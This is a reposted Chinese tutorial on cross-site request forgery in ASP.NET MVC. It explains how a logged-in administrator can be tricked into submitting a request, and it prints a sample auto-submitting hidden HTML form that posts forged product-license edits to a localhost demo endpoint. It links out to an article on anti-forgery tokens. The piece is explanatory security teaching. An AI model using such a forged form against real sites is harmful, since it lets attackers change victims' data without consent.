跨站请求伪造CSRF(Cross-site request forgery)
2018-06-22 07:46:51来源:未知 阅读 ()
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用
一般被攻击步骤:
1.登录受信任网站A,并在本地生成Cookie。
2.在不登出A的情况下,访问危险网站B。
所以没事的时候不要乱点链接不是随便说着玩的。
常见场景分析:
假设你有一个这样的Action,因为已经加了[Authorize(Roles = "Admins")]标记,所以只有管理员角色才可以提交数据
[HttpPost] [Authorize(Roles = "Admins")] public ActionResult Edit(ProductDetails productdetails) { if (ModelState.IsValid) { db.Entry(productdetails).State = EntityState.Modified; db.SaveChanges(); return RedirectToAction("Index"); } return View(productdetails); }
非管理员访问这个请求会被重定向到登录页,目前来看还是相对安全的。
那么假设有一个管理员已经登录了网站,就是说上面的第一步已经完成,
坐等第二步,第二步 如何实现呢,其实很简单,
一个恶意分子 模拟了这个表单提交,并且把这个表单放到了一个恶意网站下面,
如果上面的网站管理员碰巧点了这个链接(比如收到一个恶意邮件,诸如此类),恶意链接被点开并加载以后,
那么这个时候上面的Edit 请求就被管理员无意识的触发了,
第二步操作完成,攻击成功。
<form name="csrfhackForm" method="post" action="http://localhost:63577/ProductDetails/Edit"> <input type="hidden" name="Id" value="1" /> <input type="hidden" name="LicenseCount" value="5" /> <input type="hidden" name="LicenseUsedCount" value="1" /> <input type="hidden" name="AccountUserName" value="Hacker" /> <input type="hidden" name="ProductName" value="B2B Product 101" /> </form> <script type="text/javascript"> document.csrfhackForm.submit(); </script>
http://www.devcurry.com/2013/01/what-is-antiforgerytoken-and-why-do-i.html
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:B/S(Web)实时通讯解决方案
下一篇:Nuget Server 搭建
- MVC 5限制所有HTTP请求必须是POST方式 2020-03-14
- ASP.NET页面请求超时时间设置多种方法 2019-11-19
- .net mvc超过了最大请求长度的解决方法 2019-08-09
- IIS下网站对options请求直接返回404 2019-05-13
- 第40章 自定义令牌请求验证和发布 2019-04-28
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash